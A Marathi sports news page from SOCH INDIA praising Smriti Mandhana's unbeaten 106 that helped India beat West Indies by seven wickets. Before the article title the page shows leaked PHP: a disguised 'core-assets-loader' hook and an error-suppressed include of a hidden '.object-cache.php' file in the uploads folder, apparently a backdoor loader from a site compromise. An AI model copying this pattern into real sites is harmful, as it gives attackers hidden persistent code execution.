add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘सांगलीची स्मृती भारतीय महिला संघाची सचिन’ – SOCH INDIA
Menu

खेल
‘सांगलीची स्मृती भारतीय महिला संघाची सचिन’

nobanner

महिला क्रिकेट विश्वचषकात सांगलीची पोरगी स्मृती मंधानाने धडाकेबाज कामगिरी केली आहे. मंधानांच्या वादळी नाबाद शतकाच्या जोरावर भारताने वेस्ट इंडिज महिला संघावर तब्बल 7 विकेट्सने विजय मिळवला.

मंधानाने 108 चेंडूत 13 चौकार आणि 2 उत्तुंक षटकार ठोकत नाबाद 106 धावा ठोकल्या.

या सामन्यात भारताने प्रभावी क्षेत्ररक्षणाच्या जोरावर वेस्ट इंडिजचा डाव 50 ओव्हरमध्ये आठ विकेट्स घेत 183 वर गुंडाळला. स्मृती मंधानाच्या नाबाद 106 धावा जोरावर भारतानं 183 धावांचं लक्ष्य सहज पार केलं.

स्मृती मंधानाच्या या कामगिरीच्या जोरावर सध्या तिच्यावर सोशल मीडियातून कौतुकाचा वर्षाव होत आहे. स्मृतीला भारतीय महिला टीमची सचिन संबोधलं जात आहे.

टीम इंडियाचा माजी स्फोटक फलंदाज वीरेंद्र सेहवाग म्हणतो, “या शानदार विजयाबद्दल बीसीसीआयच्या महिला संघाचं अभिनंदन. स्मृती मंधानाची कामगिरी जबरदस्त. आपला संघ अशीच उत्तम कामगिरी करुन आपल्याला आनंद देत राहो हीच इच्छा”